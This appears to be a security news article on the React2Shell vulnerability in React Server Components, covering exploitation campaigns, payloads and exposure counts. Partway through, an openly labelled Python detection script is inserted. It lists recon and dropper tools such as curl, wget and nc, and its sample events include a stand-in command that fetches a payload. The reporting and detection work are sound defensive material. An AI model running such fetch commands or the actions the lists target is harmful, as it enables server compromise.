
React2Shell Zero-Day Spirals Out of Control, Exposes Over 137,000 Servers Worldwide

Cyber Hunter Team
December 14, 2025
4 min read

Critical CVE-2025-55182 vulnerability triggers mass exploitation across React and Next.js ecosystems

A critical vulnerability known as React2Shell (CVE-2025-55182 – CVSS 10.0) has rapidly escalated into a global exploitation wave, impacting more than 137,000 exposed servers worldwide.

The severity of the issue prompted CISA to issue an urgent directive requiring U.S. federal agencies to apply patches before December 12, 2025.

Technical Overview

The vulnerability affects the React Server Components (RSC) Flight protocol and stems from unsafe deserialization. Exploitation allows attackers to execute privileged JavaScript code on the server via a single crafted HTTP request — without:

  • Authentication
  • User interaction
  • Elevated privileges

Although initially associated with React, the impact extends across frameworks built around the ecosystem, including:

  • Next.js
  • Waku
  • Vite
  • React Router
  • RedwoodSDK

Active Exploitation Campaigns

Since public disclosure on December 3, 2025, multiple threat actors have actively weaponized the flaw in campaigns involving:

  • Reconnaissance
  • Malware delivery
  • Botnet deployment
  • Cryptocurrency mining

Cloudflare and Wiz reported that most attacks are targeting internet-exposed Next.js applications, particularly those running in:

  • Kubernetes environments
  • Managed cloud services

Attackers have conducted large-scale internet scanning to identify vulnerable hosts. Notably, some scanning campaigns excluded Chinese IP ranges while heavily targeting networks in:

  • Taiwan
  • Xinjiang Uyghur region
  • Vietnam
  • Japan
  • New Zealand

This pattern suggests potential geopolitical targeting rather than purely opportunistic exploitation.

Targets and Impact

Observed targets include:

  • Government (.gov) websites
  • Universities and research institutions
  • Organizations involved in nuclear fuel and strategic materials

Kaspersky recorded more than 35,000 exploitation attempts in a single day (December 10). Attack chains typically began with simple reconnaissance commands such as whoami, followed by payload deployment, including:

  • Mirai and Gafgyt botnets
  • Cryptocurrency miners
  • Cobalt Strike and Sliver frameworks
  • FRP and Nezha tools
  • Node.js malware leveraging TruffleHog and Gitleaks to extract secrets
  • Go-based backdoors with reverse shell and C2 capabilities
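The attack chains described above (a web server process spawning reconnaissance commands such as whoami, then fetching a payload) can be caught from process-creation telemetry. The following is an added detection example, not code from the article or from any of the vendors it cites; the JSON-lines event format and the sample events are constructed, and the process names treated as Node.js servers are an assumption to adapt to your own deployment.

```python
"""Flag recon/dropper commands spawned under a Node.js web server.
Added example, not from the article or any vendor it cites. The JSON-lines
event format and sample events are constructed; NODE_NAMES is an assumption
to adjust to the process names used in your own deployment."""

import json

NODE_NAMES = {"node", "next-server"}          # assumed server process names
RECON_CMDS = {"whoami", "id", "uname", "hostname", "ps"}
DROPPER_CMDS = {"curl", "wget", "chmod", "base64", "nc"}
SHELLS = {"sh", "bash", "dash", "ash"}

# Constructed telemetry; the sshd -> bash -> whoami admin chain must not fire.
SAMPLE_EVENTS = """\
{"pid": 100, "ppid": 1,   "comm": "node",   "argv": "node server.js"}
{"pid": 210, "ppid": 100, "comm": "sh",     "argv": "sh -c whoami"}
{"pid": 211, "ppid": 210, "comm": "whoami", "argv": "whoami"}
{"pid": 220, "ppid": 100, "comm": "sh",     "argv": "sh -c curl -s http://example.invalid/x"}
{"pid": 221, "ppid": 220, "comm": "curl",   "argv": "curl -s http://example.invalid/x"}
{"pid": 300, "ppid": 1,   "comm": "sshd",   "argv": "sshd: admin"}
{"pid": 301, "ppid": 300, "comm": "bash",   "argv": "bash"}
{"pid": 302, "ppid": 301, "comm": "whoami", "argv": "whoami"}
"""

def load_events(text):
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(l) for l in text.splitlines() if l.strip()]

def node_ancestor(ev, by_pid, max_depth=8):
    """Walk ppid links; return the nearest Node.js server ancestor, else None."""
    cur = ev
    for _ in range(max_depth):
        cur = by_pid.get(cur["ppid"])
        if cur is None or cur["comm"] in NODE_NAMES:
            return cur
    return None

def find_suspicious(events):
    """Return flagged events (with severity) that descend from a Node server."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for ev in events:
        sev = ("high" if ev["comm"] in DROPPER_CMDS else "medium" if ev["comm"] in RECON_CMDS
               else "low" if ev["comm"] in SHELLS else None)
        anc = node_ancestor(ev, by_pid)
        if sev is None or anc is None:      # benign name, or not under a web server
            continue
        hits.append({"pid": ev["pid"], "comm": ev["comm"], "argv": ev["argv"],
                     "severity": sev, "node_pid": anc["pid"]})
    return hits
```

Walking the ancestry rather than checking only the direct parent matters because the recon command usually sits under an intermediate `sh -c`, while the same `whoami` under an administrator's SSH session is left alone.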

Exploit Proliferation

VulnCheck identified over 140 proof-of-concept exploits circulating publicly. Approximately half were non-functional or misleading, but others incorporated:

  • In-memory web shells (e.g., Godzilla)
  • Automated scanning frameworks
  • Lightweight WAF implants deployed post-compromise

Investigators also uncovered an open directory containing exploitation scripts and target lists including more than 35,000 domains and nearly 600 URLs belonging to well-known companies — indicating structured and organized scanning operations.

Exposure Statistics

According to The Shadowserver Foundation:

  • Over 137,200 IP addresses are currently exposed
  • Approximately 88,900 are located in the United States
  • Germany, France, and India follow in exposure volume

Security firm Coalition compared React2Shell to Log4Shell, describing it as a:

“Systemic cyber risk aggregation event.”

Conclusion

Any organization operating internet-exposed React or Next.js applications without applying patches is already at risk.

At this stage, the question is no longer if exploitation will occur — but when.


Sources:

  • CISA
  • Cloudflare
  • Wiz
  • Kaspersky
  • VulnCheck
  • The Shadowserver Foundation
  • The Hacker News
